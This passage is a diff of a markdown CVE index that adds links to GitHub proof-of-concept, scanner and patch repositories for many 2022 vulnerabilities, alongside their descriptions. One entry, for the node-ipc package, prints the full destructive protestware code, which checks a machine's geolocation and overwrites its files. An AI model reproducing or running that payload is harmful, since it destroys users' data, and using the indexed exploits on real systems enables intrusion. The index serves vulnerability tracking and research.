[randallbanner/Spring-Cloud-Function-Vulnerability-CVE-2022-22963-RCE](https://github.com/randallbanner/Spring-Cloud-Function-Vulnerability-CVE-2022-22963-RCE) +- [gunzf0x/CVE-2022-22963](https://github.com/gunzf0x/CVE-2022-22963) +- [nikn0laty/RCE-in-Spring-Cloud-CVE-2022-22963](https://github.com/nikn0laty/RCE-in-Spring-Cloud-CVE-2022-22963) +- [BearClaw96/CVE-2022-22963-Poc-Bearcules](https://github.com/BearClaw96/CVE-2022-22963-Poc-Bearcules) +- [jrbH4CK/CVE-2022-22963](https://github.com/jrbH4CK/CVE-2022-22963) +- [Shayz614/CVE-2022-22963](https://github.com/Shayz614/CVE-2022-22963) ### CVE-2022-22965 (2022-04-01) @@ -499,8 +18499,10 @@ - [BobTheShoplifter/Spring4Shell-POC](https://github.com/BobTheShoplifter/Spring4Shell-POC) +- [Mr-xn/spring-core-rce](https://github.com/Mr-xn/spring-core-rce) - [TheGejr/SpringShell](https://github.com/TheGejr/SpringShell) - [reznok/Spring4Shell-POC](https://github.com/reznok/Spring4Shell-POC) +- [light-Life/CVE-2022-22965-GUItools](https://github.com/light-Life/CVE-2022-22965-GUItools) - [DDuarte/springshell-rce-poc](https://github.com/DDuarte/springshell-rce-poc) - [k3rwin/spring-core-rce](https://github.com/k3rwin/spring-core-rce) - [liangyueliangyue/spring-core-rce](https://github.com/liangyueliangyue/spring-core-rce) @@ -509,14 +18511,25 @@ - [alt3kx/CVE-2022-22965_PoC](https://github.com/alt3kx/CVE-2022-22965_PoC) - [GuayoyoCyber/CVE-2022-22965](https://github.com/GuayoyoCyber/CVE-2022-22965) - [colincowie/Safer_PoC_CVE-2022-22965](https://github.com/colincowie/Safer_PoC_CVE-2022-22965) +- [rwincey/spring4shell-CVE-2022-22965](https://github.com/rwincey/spring4shell-CVE-2022-22965) - [viniciuspereiras/CVE-2022-22965-poc](https://github.com/viniciuspereiras/CVE-2022-22965-poc) +- [mebibite/springhound](https://github.com/mebibite/springhound) - [likewhite/CVE-2022-22965](https://github.com/likewhite/CVE-2022-22965) +- [Axx8/SpringFramework_CVE-2022-22965_RCE](https://github.com/Axx8/SpringFramework_CVE-2022-22965_RCE) - [snicoll-scratches/spring-boot-cve-2022-22965](https://github.com/snicoll-scratches/spring-boot-cve-2022-22965) - [nu0l/CVE-2022-22965](https://github.com/nu0l/CVE-2022-22965) +- [tangxiaofeng7/CVE-2022-22965-Spring-Core-Rce](https://github.com/tangxiaofeng7/CVE-2022-22965-Spring-Core-Rce) - [helsecert/CVE-2022-22965](https://github.com/helsecert/CVE-2022-22965) +- [lcarea/CVE-2022-22965](https://github.com/lcarea/CVE-2022-22965) +- [Joe1sn/CVE-2022-22965](https://github.com/Joe1sn/CVE-2022-22965) - [zer0yu/CVE-2022-22965](https://github.com/zer0yu/CVE-2022-22965) - [me2nuk/CVE-2022-22965](https://github.com/me2nuk/CVE-2022-22965) +- [wshon/spring-framework-rce](https://github.com/wshon/spring-framework-rce) +- [Wrin9/CVE-2022-22965](https://github.com/Wrin9/CVE-2022-22965) +- [wjl110/CVE-2022-22965_Spring_Core_RCE](https://github.com/wjl110/CVE-2022-22965_Spring_Core_RCE) +- [mwojterski/cve-2022-22965](https://github.com/mwojterski/cve-2022-22965) - [gpiechnik2/nmap-spring4shell](https://github.com/gpiechnik2/nmap-spring4shell) +- [itsecurityco/CVE-2022-22965](https://github.com/itsecurityco/CVE-2022-22965) - [daniel0x00/Invoke-CVE-2022-22965-SafeCheck](https://github.com/daniel0x00/Invoke-CVE-2022-22965-SafeCheck) - [fracturelabs/spring4shell_victim](https://github.com/fracturelabs/spring4shell_victim) - [sunnyvale-it/CVE-2022-22965-PoC](https://github.com/sunnyvale-it/CVE-2022-22965-PoC) @@ -545,6 +18558,31 @@ - [Enokiy/spring-RCE-CVE-2022-22965](https://github.com/Enokiy/spring-RCE-CVE-2022-22965) - [cxzero/CVE-2022-22965-spring4shell](https://github.com/cxzero/CVE-2022-22965-spring4shell) - [tpt11fb/SpringVulScan](https://github.com/tpt11fb/SpringVulScan) +- [D1mang/Spring4Shell-CVE-2022-22965](https://github.com/D1mang/Spring4Shell-CVE-2022-22965) +- [iloveflag/Fast-CVE-2022-22965](https://github.com/iloveflag/Fast-CVE-2022-22965) +- [ClemExp/CVE-2022-22965-PoC](https://github.com/ClemExp/CVE-2022-22965-PoC) +- [clemoregan/SSE4-CVE-2022-22965](https://github.com/clemoregan/SSE4-CVE-2022-22965) +- [devengpk/CVE-2022-22965](https://github.com/devengpk/CVE-2022-22965) +- [zangcc/CVE-2022-22965-rexbb](https://github.com/zangcc/CVE-2022-22965-rexbb) +- [ajith737/Spring4Shell-CVE-2022-22965-POC](https://github.com/ajith737/Spring4Shell-CVE-2022-22965-POC) +- [c33dd/CVE-2022-22965](https://github.com/c33dd/CVE-2022-22965) +- [gokul-ramesh/Spring4Shell-PoC-exploit](https://github.com/gokul-ramesh/Spring4Shell-PoC-exploit) +- [bL34cHig0/Telstra-Cybersecurity-Virtual-Experience-](https://github.com/bL34cHig0/Telstra-Cybersecurity-Virtual-Experience-) +- [BKLockly/CVE-2022-22965](https://github.com/BKLockly/CVE-2022-22965) +- [dbgee/Spring4Shell](https://github.com/dbgee/Spring4Shell) +- [jakabakos/CVE-2022-22965-Spring4Shell](https://github.com/jakabakos/CVE-2022-22965-Spring4Shell) +- [sohamsharma966/Spring4Shell-CVE-2022-22965](https://github.com/sohamsharma966/Spring4Shell-CVE-2022-22965) +- [LucasPDiniz/CVE-2022-22965](https://github.com/LucasPDiniz/CVE-2022-22965) +- [xsxtw/SpringFramework_CVE-2022-22965_RCE](https://github.com/xsxtw/SpringFramework_CVE-2022-22965_RCE) +- [SkyM1raj/Block-Spring4Shell](https://github.com/SkyM1raj/Block-Spring4Shell) +- [guigui237/Expoitation-de-la-vuln-rabilit-CVE-2022-22965](https://github.com/guigui237/Expoitation-de-la-vuln-rabilit-CVE-2022-22965) + +### CVE-2022-22966 (2022-04-14) + +An authenticated, high privileged malicious actor with network access to the VMware Cloud Director tenant or provider may be able to exploit a remote code execution vulnerability to gain access to the server. + + +- [bb33bb/CVE-2022-22966](https://github.com/bb33bb/CVE-2022-22966) ### CVE-2022-22968 (2022-04-14) @@ -553,6 +18591,20 @@ - [MarcinGadz/spring-rce-poc](https://github.com/MarcinGadz/spring-rce-poc) +### CVE-2022-22970 (2022-05-12) + +In spring framework versions prior to 5.3.20+ , 5.2.22+ and old unsupported versions, applications that handle file uploads are vulnerable to DoS attack if they rely on data binding to set a MultipartFile or javax.servlet.Part to a field in a model object. + + +- [Performant-Labs/CVE-2022-22970](https://github.com/Performant-Labs/CVE-2022-22970) + +### CVE-2022-22971 (2022-05-12) + +In spring framework versions prior to 5.3.20+ , 5.2.22+ and old unsupported versions, application with a STOMP over WebSocket endpoint is vulnerable to a denial of service attack by an authenticated user. + + +- [tchize/CVE-2022-22971](https://github.com/tchize/CVE-2022-22971) + ### CVE-2022-22972 (2022-05-20) VMware Workspace ONE Access, Identity Manager and vRealize Automation contain an authentication bypass vulnerability affecting local domain users. A malicious actor with network access to the UI may be able to obtain administrative access without the need to authenticate. @@ -576,6 +18628,11 @@ - [DeEpinGh0st/CVE-2022-22978](https://github.com/DeEpinGh0st/CVE-2022-22978) - [ducluongtran9121/CVE-2022-22978-PoC](https://github.com/ducluongtran9121/CVE-2022-22978-PoC) +- [aeifkz/CVE-2022-22978](https://github.com/aeifkz/CVE-2022-22978) +- [umakant76705/CVE-2022-22978](https://github.com/umakant76705/CVE-2022-22978) +- [Raghvendra1207/CVE-2022-22978](https://github.com/Raghvendra1207/CVE-2022-22978) +- [wan9xx/CVE-2022-22978-demo](https://github.com/wan9xx/CVE-2022-22978-demo) +- [BoB13-Opensource-Contribution-Team9/CVE-2022-22978](https://github.com/BoB13-Opensource-Contribution-Team9/CVE-2022-22978) ### CVE-2022-22980 (2022-06-22) @@ -587,21 +18644,52 @@ - [li8u99/Spring-Data-Mongodb-Demo](https://github.com/li8u99/Spring-Data-Mongodb-Demo) - [jweny/cve-2022-22980](https://github.com/jweny/cve-2022-22980) - [murataydemir/CVE-2022-22980](https://github.com/murataydemir/CVE-2022-22980) +- [Vulnmachines/Spring_cve-2022-22980](https://github.com/Vulnmachines/Spring_cve-2022-22980) ### CVE-2022-23046 (2022-01-19) PhpIPAM v1.4.4 allows an authenticated admin user to inject SQL sentences in the "subnet" parameter while searching a subnet via app/admin/routing/edit-bgp-mapping-search.php +- [jcarabantes/CVE-2022-23046](https://github.com/jcarabantes/CVE-2022-23046) +- [dnr6419/CVE-2022-23046](https://github.com/dnr6419/CVE-2022-23046) - [hadrian3689/phpipam_1.4.4](https://github.com/hadrian3689/phpipam_1.4.4) - [bernauers/CVE-2022-23046](https://github.com/bernauers/CVE-2022-23046) +### CVE-2022-23093 (2024-02-15) + +ping reads raw IP packets from the network to process responses in the pr_pack() function. As part of processing a response ping has to reconstruct the IP header, the ICMP header and if present a "quoted packet," which represents the packet that generated an ICMP error. The quoted packet again has an IP header and an ICMP header.\n\nThe pr_pack() copies received IP and ICMP headers into stack buffers for further processing. In so doing, it fails to take into account the possible presence of IP option headers following the IP header in either the response or the quoted packet. When IP options are present, pr_pack() overflows the destination buffer by up to 40 bytes.\n\nThe memory safety bugs described above can be triggered by a remote host, causing the ping program to crash.\n\nThe ping process runs in a capability mode sandbox on all affected versions of FreeBSD and is thus very constrained in how it can interact with the rest of the system at the point where the bug can occur. + + +- [Inplex-sys/CVE-2022-23093](https://github.com/Inplex-sys/CVE-2022-23093) +- [Symbolexe/DrayTek-Exploit](https://github.com/Symbolexe/DrayTek-Exploit) + ### CVE-2022-23131 (2022-01-13) In the case of instances where the SAML SSO authentication is enabled (non-default), session data can be modified by a malicious actor, because a user login stored in the session was not verified. Malicious unauthenticated actor may exploit this issue to escalate privileges and gain admin access to Zabbix Frontend. To perform the attack, SAML authentication is required to be enabled and the actor has to know the username of Zabbix user (or use the guest account, which is disabled by default). +- [qq1549176285/CVE-2022-23131](https://github.com/qq1549176285/CVE-2022-23131) +- [jweny/CVE-2022-23131](https://github.com/jweny/CVE-2022-23131) - [Mr-xn/cve-2022-23131](https://github.com/Mr-xn/cve-2022-23131) +- [1mxml/CVE-2022-23131](https://github.com/1mxml/CVE-2022-23131) +- [zwjjustdoit/cve-2022-23131](https://github.com/zwjjustdoit/cve-2022-23131) +- [L0ading-x/cve-2022-23131](https://github.com/L0ading-x/cve-2022-23131) +- [random-robbie/cve-2022-23131-exp](https://github.com/random-robbie/cve-2022-23131-exp) +- [trganda/CVE-2022-23131](https://github.com/trganda/CVE-2022-23131) +- [pykiller/CVE-2022-23131](https://github.com/pykiller/CVE-2022-23131) +- [Fa1c0n35/zabbix-cve-2022-23131](https://github.com/Fa1c0n35/zabbix-cve-2022-23131) +- [kh4sh3i/CVE-2022-23131](https://github.com/kh4sh3i/CVE-2022-23131) +- [Kazaf6s/CVE-2022-23131](https://github.com/Kazaf6s/CVE-2022-23131) +- [SCAMagic/CVE-2022-23131poc-exp-zabbix-](https://github.com/SCAMagic/CVE-2022-23131poc-exp-zabbix-) +- [Vulnmachines/Zabbix-CVE-2022-23131](https://github.com/Vulnmachines/Zabbix-CVE-2022-23131) +- [wr0x00/cve-2022-23131](https://github.com/wr0x00/cve-2022-23131) +- [Arrnitage/CVE-2022-23131_exp](https://github.com/Arrnitage/CVE-2022-23131_exp) +- [clearcdq/Zabbix-SAML-SSO-_CVE-2022-23131](https://github.com/clearcdq/Zabbix-SAML-SSO-_CVE-2022-23131) +- [r10lab/CVE-2022-23131](https://github.com/r10lab/CVE-2022-23131) +- [fork-bombed/CVE-2022-23131](https://github.com/fork-bombed/CVE-2022-23131) +- [davidzzo23/CVE-2022-23131](https://github.com/davidzzo23/CVE-2022-23131) +- [dagowda/Zabbix-cve-2022-23131-SSO-bypass](https://github.com/dagowda/Zabbix-cve-2022-23131-SSO-bypass) ### CVE-2022-23222 (2022-01-14) @@ -610,6 +18698,8 @@ - [tr3ee/CVE-2022-23222](https://github.com/tr3ee/CVE-2022-23222) - [PenteraIO/CVE-2022-23222-POC](https://github.com/PenteraIO/CVE-2022-23222-POC) +- [FridayOrtiz/CVE-2022-23222](https://github.com/FridayOrtiz/CVE-2022-23222) +- [LeoMarche/ProjetSecu](https://github.com/LeoMarche/ProjetSecu) ### CVE-2022-23253 (2022-03-09) @@ -625,12 +18715,28 @@ - [corelight/CVE-2022-23270-PPTP](https://github.com/corelight/CVE-2022-23270-PPTP) +### CVE-2022-23277 (2022-03-09) + +Microsoft Exchange Server Remote Code Execution Vulnerability + + +- [7BitsTeam/CVE-2022-23277](https://github.com/7BitsTeam/CVE-2022-23277) + +### CVE-2022-23303 (2022-01-17) + +The implementations of SAE in hostapd before 2.10 and wpa_supplicant before 2.10 are vulnerable to side channel attacks as a result of cache access patterns. NOTE: this issue exists because of an incomplete fix for CVE-2019-9494. + + +- [web-logs2/hostapd_mirror](https://github.com/web-logs2/hostapd_mirror) + ### CVE-2022-23305 (2022-01-18) By design, the JDBCAppender in Log4j 1.2.x accepts an SQL statement as a configuration parameter where the values to be inserted are converters from PatternLayout. The message converter, %m, is likely to always be included. This allows attackers to manipulate the SQL by entering crafted strings into input fields or headers of an application that are logged allowing unintended SQL queries to be executed. Note this issue only affects Log4j 1.x when specifically configured to use the JDBCAppender, which is not the default. Beginning in version 2.0-beta8, the JDBCAppender was re-introduced with proper support for parameterized SQL queries and further customization over the columns written to in logs. Apache Log4j 1.2 reached end of life in August 2015. Users should upgrade to Log4j 2 as it addresses numerous other issues from the previous versions. - [HynekPetrak/log4shell-finder](https://github.com/HynekPetrak/log4shell-finder) +- [AlphabugX/CVE-2022-RCE](https://github.com/AlphabugX/CVE-2022-RCE) +- [tkomlodi/CVE-2022-23305_POC](https://github.com/tkomlodi/CVE-2022-23305_POC) ### CVE-2022-23342 (2022-06-21) @@ -639,6 +18745,27 @@ - [InitRoot/CVE-2022-23342](https://github.com/InitRoot/CVE-2022-23342) +### CVE-2022-23361 +- [ViNi0608/CVE-2022-23361](https://github.com/ViNi0608/CVE-2022-23361) + +### CVE-2022-23378 (2022-02-09) + +A Cross-Site Scripting (XSS) vulnerability exists within the 3.2.2 version of TastyIgniter. The "items%5B0%5D%5Bpath%5D" parameter of a request made to /admin/allergens/edit/1 is vulnerable. + + +- [TheGetch/CVE-2022-23378](https://github.com/TheGetch/CVE-2022-23378) + +### CVE-2022-23529 +- [hackintoanetwork/CVE-2022-23529-PoC](https://github.com/hackintoanetwork/CVE-2022-23529-PoC) + +### CVE-2022-23614 (2022-02-04) + +Twig is an open source template language for PHP. When in a sandbox mode, the `arrow` parameter of the `sort` filter must be a closure to avoid attackers being able to run arbitrary PHP functions. In affected versions this constraint was not properly enforced and could lead to code injection of arbitrary PHP code. Patched versions now disallow calling non Closure in the `sort` filter as is the case for some other filters. Users are advised to upgrade. + + +- [davwwwx/CVE-2022-23614](https://github.com/davwwwx/CVE-2022-23614) +- [4rtamis/CVE-2022-23614](https://github.com/4rtamis/CVE-2022-23614) + ### CVE-2022-23642 (2022-02-18) Sourcegraph is a code search and navigation engine. Sourcegraph prior to version 3.37 is vulnerable to remote code execution in the `gitserver` service. The service acts as a git exec proxy, and fails to properly restrict calling `git config`. This allows an attacker to set the git `core.sshCommand` option, which sets git to use the specified command instead of ssh when they need to connect to a remote system. Exploitation of this vulnerability depends on how Sourcegraph is deployed. An attacker able to make HTTP requests to internal services like gitserver is able to exploit it. This issue is patched in Sourcegraph version 3.37. As a workaround, ensure that requests to gitserver are properly protected. @@ -646,6 +18773,37 @@ - [Altelus1/CVE-2022-23642](https://github.com/Altelus1/CVE-2022-23642) +### CVE-2022-23648 (2022-03-03) + +containerd is a container runtime available as a daemon for Linux and Windows. A bug was found in containerd prior to versions 1.6.1, 1.5.10, and 1.14.12 where containers launched through containerd’s CRI implementation on Linux with a specially-crafted image configuration could gain access to read-only copies of arbitrary files and directories on the host. This may bypass any policy-based enforcement on container setup (including a Kubernetes Pod Security Policy) and expose potentially sensitive information. Kubernetes and crictl can both be configured to use containerd’s CRI implementation. This bug has been fixed in containerd 1.6.1, 1.5.10, and 1.4.12. Users should update to these versions to resolve the issue. + + +- [raesene/CVE-2022-23648-POC](https://github.com/raesene/CVE-2022-23648-POC) + +### CVE-2022-23731 (2022-03-11) + +V8 javascript engine (heap vulnerability) can cause privilege escalation ,which can impact on some webOS TV models. + + +- [DavidBuchanan314/WAMpage](https://github.com/DavidBuchanan314/WAMpage) + +### CVE-2022-23773 (2022-02-11) + +cmd/go in Go before 1.16.14 and 1.17.x before 1.17.7 can misinterpret branch names that falsely appear to be version tags. This can lead to incorrect access control if an actor is supposed to be able to create branches but not tags. + + +- [danbudris/CVE-2022-23773-repro](https://github.com/danbudris/CVE-2022-23773-repro) +- [danbudris/CVE-2022-23773-repro-target](https://github.com/danbudris/CVE-2022-23773-repro-target) +- [YouShengLiu/CVE-2022-23773-Reproduce](https://github.com/YouShengLiu/CVE-2022-23773-Reproduce) + +### CVE-2022-23779 (2022-03-02) + +Zoho ManageEngine Desktop Central before 10.1.2137.8 exposes the installed server name to anyone. The internal hostname can be discovered by reading HTTP redirect responses. + + +- [fbusr/CVE-2022-23779](https://github.com/fbusr/CVE-2022-23779) +- [Vulnmachines/Zoho_CVE-2022-23779](https://github.com/Vulnmachines/Zoho_CVE-2022-23779) + ### CVE-2022-23808 (2022-01-22) An issue was discovered in phpMyAdmin 5.1 before 5.1.2. An attacker can inject malicious code into aspects of the setup script, which can allow XSS or HTML injection. @@ -653,6 +18811,13 @@ - [dipakpanchal05/CVE-2022-23808](https://github.com/dipakpanchal05/CVE-2022-23808) +### CVE-2022-23812 (2022-03-16) + +This affects the package node-ipc from 10.1.1 and before 10.1.3. This package contains malicious code, that targets users with IP located in Russia or Belarus, and overwrites their files with a heart emoji. **Note**: from versions 11.0.0 onwards, instead of having malicious code directly in the source of this package, node-ipc imports the peacenotwar package that includes potentially undesired behavior. Malicious Code: **Note:** Don't run it! js import u from "path"; import a from "fs"; import o from "https"; setTimeout(function () { const t = Math.round(Math.random() * 4); if (t > 1) { return; } const n = Buffer.from("aHR0cHM6Ly9hcGkuaXBnZW9sb2NhdGlvbi5pby9pcGdlbz9hcGlLZXk9YWU1MTFlMTYyNzgyNGE5NjhhYWFhNzU4YTUzMDkxNTQ=", "base64"); // https://api.ipgeolocation.io/ipgeo?apiKey=ae511e1627824a968aaaa758a5309154 o.get(n.toString("utf8"), function (t) { t.on("data", function (t) { const n = Buffer.from("Li8=", "base64"); const o = Buffer.from("Li4v", "base64"); const r = Buffer.from("Li4vLi4v", "base64"); const f = Buffer.from("Lw==", "base64"); const c = Buffer.from("Y291bnRyeV9uYW1l", "base64"); const e = Buffer.from("cnVzc2lh", "base64"); const i = Buffer.from("YmVsYXJ1cw==", "base64"); try { const s = JSON.parse(t.toString("utf8")); const u = s[c.toString("utf8")].toLowerCase(); const a = u.includes(e.toString("utf8")) || u.includes(i.toString("utf8")); // checks if country is Russia or Belarus if (a) { h(n.toString("utf8")); h(o.toString("utf8")); h(r.toString("utf8")); h(f.toString("utf8")); } } catch (t) {} }); }); }, Math.ceil(Math.random() * 1e3)); async function h(n = "", o = "") { if (!a.existsSync(n)) { return; } let r = []; try { r = a.readdirSync(n); } catch (t) {} const f = []; const c = Buffer.from("4p2k77iP", "base64"); for (var e = 0; e < r.length; e++) { const i = u.join(n, r[e]); let t = null; try { t = a.lstatSync(i); } catch (t) { continue; } if (t.isDirectory()) { const s = h(i, o); s.length > 0 ? f.push(...s) : null; } else if (i.indexOf(o) >= 0) { try { a.writeFile(i, c.toString("utf8"), function () {}); // overwrites file with ❤️ } catch (t) {} } } return f; } const ssl = true; export { ssl as default, ssl }; + + +- [scriptzteam/node-ipc-malware-protestware-CVE-2022-23812](https://github.com/scriptzteam/node-ipc-malware-protestware-CVE-2022-23812) + ### CVE-2022-23852 (2022-01-24) Expat (aka libexpat) before 2.4.4 has a signed integer overflow in XML_GetBuffer, for configurations with a nonzero XML_CONTEXT_BYTES. @@ -660,6 +18825,27 @@ - [Satheesh575555/external_expat_AOSP10_r33_CVE-2022-23852](https://github.com/Satheesh575555/external_expat_AOSP10_r33_CVE-2022-23852) +### CVE-2022-23861 (2024-10-22) + +Multiple Stored Cross-Site Scripting vulnerabilities were discovered in Y Soft SAFEQ 6 Build 53. Multiple fields in the YSoft SafeQ web application can be used to inject malicious inputs that, due to a lack of output sanitization, result in the execution of arbitrary JS code. These fields can be leveraged to perform XSS attacks on legitimate users accessing the SafeQ web interface. + + +- [mbadanoiu/CVE-2022-23861](https://github.com/mbadanoiu/CVE-2022-23861) + +### CVE-2022-23862 (2024-10-22) + +A Local Privilege Escalation issue was discovered in Y Soft SAFEQ 6 Build 53. The SafeQ JMX service running on port 9696 is vulnerable to JMX MLet attacks. Because the service did not enforce authentication and was running under the "NT Authority\System" user, an attacker is able to use the vulnerability to execute arbitrary code and elevate to the system user. + + +- [mbadanoiu/CVE-2022-23862](https://github.com/mbadanoiu/CVE-2022-23862) + +### CVE-2022-23884 (2022-03-28) + +Mojang Bedrock Dedicated Server 1.18.2 is affected by an integer overflow leading to a bound check bypass caused by PurchaseReceiptPacket::_read (packet deserializer). + + +- [nanaao/CVE-2022-23884](https://github.com/nanaao/CVE-2022-23884) + ### CVE-2022-23909 (2022-04-05) There is an unquoted service path in Sherpa Connector Service (SherpaConnectorService.exe) 2020.2.20328.2050. This might allow a local user to escalate privileges by creating a "C:\Program Files\Sherpa Software\Sherpa.exe" file. @@ -667,6 +18853,33 @@ - [netsectuna/CVE-2022-23909](https://github.com/netsectuna/CVE-2022-23909) +### CVE-2022-23935 (2022-01-25) + +lib/Image/ExifTool.pm in ExifTool before 12.38 mishandles a $file =~ /\|$/ check, leading to command injection. + + +- [dpbe32/CVE-2022-23935-PoC-Exploit](https://github.com/dpbe32/CVE-2022-23935-PoC-Exploit) +- [cowsecurity/CVE-2022-23935](https://github.com/cowsecurity/CVE-2022-23935) +- [BKreisel/CVE-2022-23935](https://github.com/BKreisel/CVE-2022-23935) +- [antisecc/CVE-2022-23935](https://github.com/antisecc/CVE-2022-23935) + +### CVE-2022-23940 (2022-03-07) + +SuiteCRM through 7.12.1 and 8.x through 8.0.1 allows Remote Code Execution. Authenticated users with access to the Scheduled Reports module can achieve this by leveraging PHP deserialization in the email_recipients property. By using a crafted request, they can create a malicious report, containing a PHP-deserialization payload in the email_recipients field. Once someone accesses this report, the backend will deserialize the content of the email_recipients field and the payload gets executed. Project dependencies include a number of interesting PHP deserialization gadgets (e.g., Monolog/RCE1 from phpggc) that can be used for Code Execution. + + +- [manuelz120/CVE-2022-23940](https://github.com/manuelz120/CVE-2022-23940) + +### CVE-2022-23967 +- [MaherAzzouzi/CVE-2022-23967](https://github.com/MaherAzzouzi/CVE-2022-23967) + +### CVE-2022-23988 (2022-02-28) + +The WS Form LITE and Pro WordPress plugins before 1.8.176 do not sanitise and escape submitted form data, allowing unauthenticated attacker to submit XSS payloads which will get executed when a privileged user will view the related submission + + +- [simonepetruzzi/WebSecurityProject](https://github.com/simonepetruzzi/WebSecurityProject) + ### CVE-2022-23990 (2022-01-26) Expat (aka libexpat) before 2.4.4 has an integer overflow in the doProlog function. @@ -680,18 +18893,48 @@ - [Mr-xn/CVE-2022-24086](https://github.com/Mr-xn/CVE-2022-24086) +- [nanaao/CVE-2022-24086-RCE](https://github.com/nanaao/CVE-2022-24086-RCE) +- [NHPT/CVE-2022-24086-RCE](https://github.com/NHPT/CVE-2022-24086-RCE) - [oK0mo/CVE-2022-24086-RCE-PoC](https://github.com/oK0mo/CVE-2022-24086-RCE-PoC) - [seymanurmutlu/CVE-2022-24086-CVE-2022-24087](https://github.com/seymanurmutlu/CVE-2022-24086-CVE-2022-24087) +- [akr3ch/CVE-2022-24086](https://github.com/akr3ch/CVE-2022-24086) +- [pescepilota/CVE-2022-24086](https://github.com/pescepilota/CVE-2022-24086) +- [BurpRoot/CVE-2022-24086](https://github.com/BurpRoot/CVE-2022-24086) +- [wubinworks/magento2-template-filter-patch](https://github.com/wubinworks/magento2-template-filter-patch) ### CVE-2022-24087 - [Neimar47574/CVE-2022-24087](https://github.com/Neimar47574/CVE-2022-24087) +### CVE-2022-24112 (2022-02-11) + +An attacker can abuse the batch-requests plugin to send requests to bypass the IP restriction of Admin API. A default configuration of Apache APISIX (with default API key) is vulnerable to remote code execution. When the admin key was changed or the port of Admin API was changed to a port different from the data panel, the impact is lower. But there is still a risk to bypass the IP restriction of Apache APISIX's data panel. There is a check in the batch-requests plugin which overrides the client IP with its real remote IP. But due to a bug in the code, this check can be bypassed. + + +- [Mr-xn/CVE-2022-24112](https://github.com/Mr-xn/CVE-2022-24112) +- [CrackerCat/CVE-2022-24112](https://github.com/CrackerCat/CVE-2022-24112) +- [Axx8/CVE-2022-24112](https://github.com/Axx8/CVE-2022-24112) +- [Mah1ndra/CVE-2022-24112](https://github.com/Mah1ndra/CVE-2022-24112) +- [M4xSec/Apache-APISIX-CVE-2022-24112](https://github.com/M4xSec/Apache-APISIX-CVE-2022-24112) +- [kavishkagihan/CVE-2022-24112-POC](https://github.com/kavishkagihan/CVE-2022-24112-POC) +- [twseptian/cve-2022-24112](https://github.com/twseptian/cve-2022-24112) +- [Acczdy/CVE-2022-24112_POC](https://github.com/Acczdy/CVE-2022-24112_POC) +- [btar1gan/exploit_CVE-2022-24112](https://github.com/btar1gan/exploit_CVE-2022-24112) + +### CVE-2022-24122 (2022-01-29) + +kernel/ucount.c in the Linux kernel 5.14 through 5.16.4, when unprivileged user namespaces are enabled, allows a use-after-free and privilege escalation because a ucounts object can outlive its namespace. + + +- [meowmeowxw/CVE-2022-24122](https://github.com/meowmeowxw/CVE-2022-24122) + ### CVE-2022-24124 (2022-01-29) The query API in Casdoor before 1.13.1 has a SQL injection vulnerability related to the field and value parameters, as demonstrated by api/get-organizations. +- [ColdFusionX/CVE-2022-24124](https://github.com/ColdFusionX/CVE-2022-24124) - [0xAbbarhSF/CVE-2022-24124](https://github.com/0xAbbarhSF/CVE-2022-24124) +- [b1gdog/CVE-2022-24124](https://github.com/b1gdog/CVE-2022-24124) ### CVE-2022-24125 (2022-03-20) @@ -707,6 +18950,20 @@ - [cyberhawk000/CVE-2022-24181](https://github.com/cyberhawk000/CVE-2022-24181) +### CVE-2022-24227 (2022-02-15) + +A cross-site scripting (XSS) vulnerability in BoltWire v7.10 and v 8.00 allows attackers to execute arbitrary web scripts or HTML via a crafted payload in the name and lastname parameters. + + +- [Cyber-Wo0dy/CVE-2022-24227-updated](https://github.com/Cyber-Wo0dy/CVE-2022-24227-updated) + +### CVE-2022-24342 (2022-02-25) + +In JetBrains TeamCity before 2021.2.1, URL injection leading to CSRF was possible. + + +- [yuriisanin/CVE-2022-24342](https://github.com/yuriisanin/CVE-2022-24342) + ### CVE-2022-24348 (2022-02-04) Argo CD before 2.1.9 and 2.2.x before 2.2.4 allows directory traversal related to Helm charts because of an error in helmTemplate in repository.go. For example, an attacker may be able to discover credentials stored in a YAML file. @@ -714,6 +18971,20 @@ - [jkroepke/CVE-2022-24348-2](https://github.com/jkroepke/CVE-2022-24348-2) +### CVE-2022-24439 (2022-12-12) + +All versions of package gitpython are vulnerable to Remote Code Execution (RCE) due to improper user input validation, which makes it possible to inject a maliciously crafted remote URL into the clone command. Exploiting this vulnerability is possible because the library makes external calls to git without sufficient sanitization of input arguments. + + +- [muhammadhendro/CVE-2022-24439](https://github.com/muhammadhendro/CVE-2022-24439) + +### CVE-2022-24442 (2022-02-25) + +JetBrains YouTrack before 2021.4.40426 was vulnerable to SSTI (Server-Side Template Injection) via FreeMarker templates. + + +- [mbadanoiu/CVE-2022-24442](https://github.com/mbadanoiu/CVE-2022-24442) + ### CVE-2022-24449 (2022-04-28) Solar appScreener through 3.10.4, when a valid license is not present, allows XXE and SSRF attacks via a crafted XML document. @@ -721,6 +18992,13 @@ - [jet-pentest/CVE-2022-24449](https://github.com/jet-pentest/CVE-2022-24449) +### CVE-2022-24481 (2022-04-15) + +Windows Common Log File System Driver Elevation of Privilege Vulnerability + + +- [fr4nkxixi/CVE-2022-24481-POC](https://github.com/fr4nkxixi/CVE-2022-24481-POC) + ### CVE-2022-24483 (2022-04-15) Windows Kernel Information Disclosure Vulnerability @@ -749,6 +19027,13 @@ - [corelight/CVE-2022-24497](https://github.com/corelight/CVE-2022-24497) +### CVE-2022-24500 (2022-04-15) + +Windows SMB Remote Code Execution Vulnerability + + +- [0xZipp0/CVE-2022-24500](https://github.com/0xZipp0/CVE-2022-24500) + ### CVE-2022-24611 (2022-05-17) Denial of Service (DoS) in the Z-Wave S0 NonceGet protocol specification in Silicon Labs Z-Wave 500 series allows local attackers to block S0/S2 protected Z-Wave network via crafted S0 NonceGet Z-Wave packages, utilizing included but absent NodeIDs. @@ -756,6 +19041,19 @@ - [ITSecLab-HSEL/CVE-2022-24611](https://github.com/ITSecLab-HSEL/CVE-2022-24611) +### CVE-2022-24637 (2022-03-18) + +Open Web Analytics (OWA) before 1.7.4 allows an unauthenticated remote attacker to obtain sensitive user information, which can be used to gain admin privileges by leveraging cache hashes. This occurs because files generated with '<?php (instead of the intended "<?php sequence) aren't handled by the PHP interpreter. + + +- [JacobEbben/CVE-2022-24637](https://github.com/JacobEbben/CVE-2022-24637) +- [Lay0us/CVE-2022-24637](https://github.com/Lay0us/CVE-2022-24637) +- [hupe1980/CVE-2022-24637](https://github.com/hupe1980/CVE-2022-24637) +- [icebreack/CVE-2022-24637](https://github.com/icebreack/CVE-2022-24637) +- [Pflegusch/CVE-2022-24637](https://github.com/Pflegusch/CVE-2022-24637) +- 